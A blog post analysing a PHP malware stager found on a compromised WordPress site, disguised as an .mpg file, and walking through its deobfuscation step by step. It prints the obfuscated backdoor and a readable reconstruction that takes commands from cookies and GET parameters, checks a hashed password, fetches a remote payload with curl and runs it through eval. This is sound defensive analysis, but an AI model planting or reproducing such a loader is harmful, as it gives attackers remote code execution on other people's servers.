Deobfuscating a Malware Stager
I was recently approached by a friend in regards to a WordPress site they manage that had been compromised. While they planned on wiping the site entirely to make sure nothing malicious was left behind, something they had been looking forward to doing anyways, they did offer to let me look over some of the malicious files to see if I could gleem any interesting info. There were dozens of files; most of which had random gibberish as file names.
With their permission, today I’ll be going over my process for deobfuscating one of the files found there, bqyejP.mpg
. Both the original file and the deobfuscated version can be found here. Just know that your antivirus will probably try to prevent you from unzipping the file.
Deobfuscating A Video?
Now, this file caught both of our eyes due not only to the fact that it has the MPG file extension, but also because it was placed in folder named the same as this friend’s username! A username that they were confident wasn’t referenced anywhere on this compromised site! Concerned that this may be something freaky, they left it to me to check the file out. Much to our relief, it was not a video at all, but instead it was a PHP file that had been given the mpg extension.
Step 0: Make It Readable
My first step in deobfuscating the file is throwing it in a text editor. In this case I went with Notepad++ due to its willingness to open any file regardless of its contents, as well as its powerful regular expression find/replace capabilities.
Upon opening the file, the first thing I’m greeted with is a wall of webdings and unicode characters.
<?php $vb /*-bG;8><b-*///
= /*-d6v$}L9y?2-*///
"r"./*-
⇡┾↺﹄➯♛↩㊟
tZ[`@⇡┾↺﹄➯♛↩㊟
-*///
"a"."n"./*-94mNXY-*///
"g"."e"; /*-
▼⑲│$⊹☂▬⋘Ⓡ✐▩≃⓫➼ø⇦¿⋽∮◦﹫⋉⇋
7N▼⑲│$⊹☂▬⋘Ⓡ✐▩≃⓫➼ø⇦¿⋽∮◦﹫⋉⇋
-*///
// ...
The entire file looks like this: A couple snippets of actual PHP code with large chunks of comments separating them. In order to get the file anywhere near legible, let’s start with removing all the comments. To accomplish this, I found that the regex /\/\*.+?\*\/\/{2}?\n?/gm
correctly finds all of these blocks for me. I can then replace all of them with nothing, which gets me just the code, and all of it on one line. If I now use a plugin to format this, I get the following.
<?php
$vb = "r" . "a" . "n" . "g" . "e";
$ZM = $vb("~", " ");
$Nz = ${$ZM[6 + 25] . $ZM[43 + 16] . $ZM[13 + 34] . $ZM[22 + 25] . $ZM[48 + 3] . $ZM[35 + 18] . $ZM[41 + 16]};
if ((in_array(gettype($Nz) . count($Nz), $Nz) && count($Nz) == 20)) {
(($Nz[62] = $Nz[62] . $Nz[76]) && ($Nz[90] = $Nz[62]($Nz[90])) && (@eval($Nz[62](${$Nz[36]}[14]))));
}
// ...
Already we can see a handful of the tactics we’ll be dealing with. Formulaic array indices, variables as functions, obsessively concatenated strings and the like are all call signs of malware.
In the next step we’ll start truly deobfuscating this file. As I go through the steps, though, know that I save off a copy of the file after each major step. So far, we have two files: the original, untouched file, and the de-commented and formatted code.
Step 1: What Can be Deciphered?
The next step in my process is consolidating the more obvious parts of the code. By manually concatenating strings and solving for array indices, we can start to get a clearer picture of what’s going on. Another tool at our disposal is the PHP engine itself. By running smaller bits of code just to see what they solve to, we can eliminate a fair bit of the manual work. Right off the bat, we can see that $vb
equals the string range
, and then $vb
is used as a function on the following line. With this acknowledged, we can fix the code to the following.
<?php
$ZM = range("~", " ");
If we were to run this in PHP and dump its value, we’d find that this returns an array of strings containing both capital and lowercase A through Z, numbers 0 through 9, as well as a handful of special characters. Given this informational, we can rename $ZM
to something more useful like $alphaNumRange
;
To solve the next line, $Nz = ...
, we’ll go ahead let PHP solve this for us with the following script.
<?php
$alphaNumRange = range("~", " ");
echo $alphaNumRange[6 + 25] . $alphaNumRange[43 + 16] . $alphaNumRange[13 + 34] . $alphaNumRange[22 + 25] . $alphaNumRange[48 + 3] . $alphaNumRange[35 + 18] . $alphaNumRange[41 + 16];
Running this tells us that the string being built here is _COOKIE
. Combining this with the recently deprecated ${...}
string interpolation, we now know that $Nz
is being assigned to the $_COOKIE
superglobal.
Admittedly, exactly what these next few lines are doing is hard for me to tell. Knowing that $Nz == $_COOKIE
, the condition for this if
statement seems quite clear. If there’s a cookie named array<count of cookies>
and the count of cookies is 20 (thus meaning there needs to be a cookie named array20
), then execute the next line. What this next line is doing, though, is indeterminable due to the fact that we don’t know what cookies the attacker would’ve sent with the request. Furthermore, indices of the $_COOKIE
array much higher than 20 are being accessed here. How this could be, when we know the count of cookies must be 20, I am unsure. What we can be sure of, though, is that $Nz[62]
becomes another function name by concatenating $Nz[62]
and $Nz[76]
. This function is then evaluated with $Nz[90]
and later with $Nz[36]
as values.
$Nz = $_COOKIE;
if ((in_array(gettype($Nz) . count($Nz), $Nz) && count($Nz) == 20)) {
(($Nz[62] = $Nz[62] . $Nz[76]) && ($Nz[90] = $Nz[62]($Nz[90])) && (@eval($Nz[62](${$Nz[36]}[14]))));
}
Cleaning up the Class
After this block is a class of some sort. The line immediately after the class calls a function of said class. Given this, we can rename the class to Stager
, and rename that function to main
.
class Stager
{
static function hsn($FdyqJwSrTo)
{
//...
}
static function hCejx($xmeTW, $zroVRZOQK)
{
//...
}
static function main()
{
$OShi = array("29294{29279{29292{29296{29277{29292{29298{29291{29276{29283{29294{29277{29288{29282{29283", //...
foreach ($OShi as $yl)
$TSPfKDnYk[] = self::hsn($yl);
$qTtn = @$TSPfKDnYk[1](${"_" . "G" . "E" . "T"}[$TSPfKDnYk[6 + 3]]);
$FHGrkbXv = @$TSPfKDnYk[2 + 1]($TSPfKDnYk[1 + 5], $qTtn);
$wFyhs = $TSPfKDnYk[0 + 2]($FHGrkbXv, true);
@${"_" . "G" . "E" . "T"}[$TSPfKDnYk[0 + 10]] == 1 && die($TSPfKDnYk[0 + 5](__FILE__));
if (((@$wFyhs[0] - time()) > 0) and (md5(md5($wFyhs[2 + 1])) === "bc73324f3b90c07811d595547a663224")):
$JjnD = self::hCejx($wFyhs[1 + 0], $TSPfKDnYk[0 + 5]);
@eval($TSPfKDnYk[4 + 0]($JjnD));
die;
endif;
}
}
Stager::main();
Going into the main
function, the first thing we see is an array of numbers and opening brackets. We’ll ignore this for now, and assume it’ll make more sense later. In fact, the next two lines iterate over this array! The loop seems to be calling the hsn
function on each element of this array, and assigning the output to a new array. So, what’s hsn
doing?
Decoding hsn
static function hsn($FdyqJwSrTo)
{
$eNulC = "r" . "a" . "n" . "g" . "e";
$NIg = $eNulC("~", " ");
$lXmY = explode("{", $FdyqJwSrTo);
$eNy = "";
foreach ($lXmY as $Rp => $KYRqDkw)
$eNy .= $NIg[$KYRqDkw - 29267];
return $eNy;
}
Even at just a glance, we can already tell that this looks an awful lot like the decoding mechanism at the start of the file. We have a string built to hold the value range
, and we then use that string for a function call. This is the same alphanumeric range we used earlier. We then explode the input on any {
characters to create an array of numbers. The numbers then have a constant offset subtracted from them to get an index of the alphanumeric range. This explains the odd array we saw in the main
function then!
Given all of the above, we can then rewrite the function to something like the following.
static function decode($input)
{
$alphaNumRange = range("~", " ");
$rangeIndices = explode("{", $input);
$output = "";
foreach ($rangeIndices as $i => $indexOffset)
{
$output .= $alphaNumRange[$indexOffset - 29267];
}
return $output;
}
If we then take this decoder function, and the $OShi
array from main
into a separate file, and dump the output, we get the following values. At the same time, we’ll rename $OShi
to $encodedParts
.
$encodedParts = [
"create_function",
"str_rot13",
"json_decode",
"pack",
"base64_decode",
"file_get_contents",
"H*",
"}",
"/*",
"ARRAY",
"of"
];
Consolidating main
With this array, we can solve much of the rest of the main
function by replacing the $encodedParts
calls with their actual values. By doing this, we now have something like this.
static function main()
{
$encodedParts = [
// create_function
"29294{29279{29292{29296{29277{29292{29298{29291{29276{29283{29294{29277{29288{29282{29283",
// str_rot13
"29278{29277{29279{29298{29279{29282{29277{29344{29342",
// json_decode
"29287{29278{29282{29283{29298{29293{29292{29294{29282{29293{29292",
// pack
"29281{29296{29294{29286",
// base64_decode
"29295{29296{29278{29292{29339{29341{29298{29293{29292{29294{29282{29293{29292",
// file_get_contents
"29291{29288{29285{29292{29298{29290{29292{29277{29298{29294{29282{29283{29277{29292{29283{29277{29278",
// H*
"29321{29351",
// }
"29268",
// /*
"29346{29351",
// ARRAY
"29328{29311{29311{29328{29304",
// of
"29282{29291"
];
foreach ($encodedParts as $encoded) {
$encodedParts[] = self::decode($encoded);
}
// The stager's payload -- hexidecimal format
$commandPayload = @str_rot13($_GET["ARRAY"]);
// The stager's payload -- a JSON array string
$unpackedPayload = @pack("H*", $commandPayload);
// json_decode($unpackedPayload, true)
$payloadArray = $json_decode($unpackedPayload, true);
// Exit if the GET param named "of" is equal to 1, and also dump this files's contents
@$_GET["of"] == 1 && die(file_get_contents(__FILE__));
if (
( // Check if the first user-provided value is greater than the server time
(@$payloadArray[0] - time()) > 0
) && ( // Check if the user-provided value matches a hard-coded password
md5(md5($payloadArray[3])) === "bc73324f3b90c07811d595547a663224"
)
) {
// unknown for now
$unknownReturn = self::hCejx($payloadArray[1], "file_get_contents");
// evaluate the new payload after base64 decoding
@eval(base64_decode($unknownReturn));
die;
}
}
Now we can get a slightly more clear picture of what the stager is doing. We can see that the function is taking input from a GET request, and it’s coming in the form of a JSON encoded array of values. The first check, $_GET["of"]
, seems to be a way to ensure the file is there by dying and dumping its own contents. The second check then only allows the stager to fire if two conditions are met.
First, the first index of the input array must be a time value that is greater than the server time. The second check then compares the fourth value against a double MD5 hashed password value. This serves as a loose guarantee that no other adversary uses the script while the attacker is working, or even after they’re done. At this time, I have not cracked this password, though it could be fairly easy with the right machine. I leave this as an exercise for you, reader.
Once those two conditions are met, we can then do something using the class’s hCejx
function, which we then evaluate the bas64 decoded output of.
Translating hCejx
Right off the bat, it’s almost too obvious what hCejx
is doing.
static function hCejx($xmeTW, $zroVRZOQK)
{
$SvpJWtNAd = curl_init($xmeTW);
curl_setopt($SvpJWtNAd, CURLOPT_RETURNTRANSFER, 1);
$MOj = curl_exec($SvpJWtNAd);
return empty($MOj) ? $zroVRZOQK($xmeTW) : $MOj;
}
Given that we have a curl_init
call using $xmeTW
, we can tell we’re making a remote call to some resource. Following some assumption on how PHP cURL calls work, we can then easily rewrite this function to something like the following.
static function fetchRemotePayload($url, $callback)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
return empty($response) ? $callback($url) : $response;
}
In case you missed it, we know that the second parameter sent to this function is file_get_contents
, so that’s how we know that $zroVRZOQK
is a callback function of some kind.
Finishing main
Now that we’ve translated hCejx
into fetchRemotePayload
, we can finish our analysis of main
.
static function main()
{
//...
if (/* ... */) {
// Fetch a new payload from a user-provided URL
$finalPayload = self::fetchRemotePayload($payloadArray[1], "file_get_contents");
// evaluate the new payload after base64 decoding
@eval(base64_decode($finalPayload));
die;
}
}
Step 2: The Big Picture
With the file now deobfuscated, the last step is to figure out what its purpose was. Despite a couple of missing pieces, namely the odd out-of-bounds indices on $_COOKIE
, the general purpose of the script can be inferred.
This file served as a staging ground where the attacker could then call other scripts from. Using the Stager::fetchRemotePayload
function, the attacker could either load a script from a web-accessible server they control, or they could, using the file_get_contents
callback, load a file from compromised server.
By using HTTP cookies and GET parameters to pass arguments to the script, the attacker has taken steps to prevent us from knowing what they truly used to script to do. Unfortunately, by the time my friend and I had noticed this use of GET params, they had already wiped the server, and thus the HTTP logs, so even that half of the equation is lost to us.
Lessons Learned
Even without exact knowledge of what the attacker did, there are still some very useful things to be learned by analyzing this script.
We can see the lengths that attackers must go to in order to get their payloads onto a server. With most servers being behind a WAF these days, even seemingly innocuous function calls like range
get obfuscated to concatenated closures.
Another interesting thing to see is the use of a custom encoding method. The way the Stager
class uses an array of numerical indexes that’ll later be used as index offsets for the range is certainly something to take note of.
The last major point I’d like to highlight is the script’s ability to fetch payloads from a remote server. While it’s capable of loading files from its host, the ability to get a payload from elsewhere allows it to leave a significantly smaller footprint on its host. This smaller footprint helps to reduce the likelihood of a sever admin noticing it.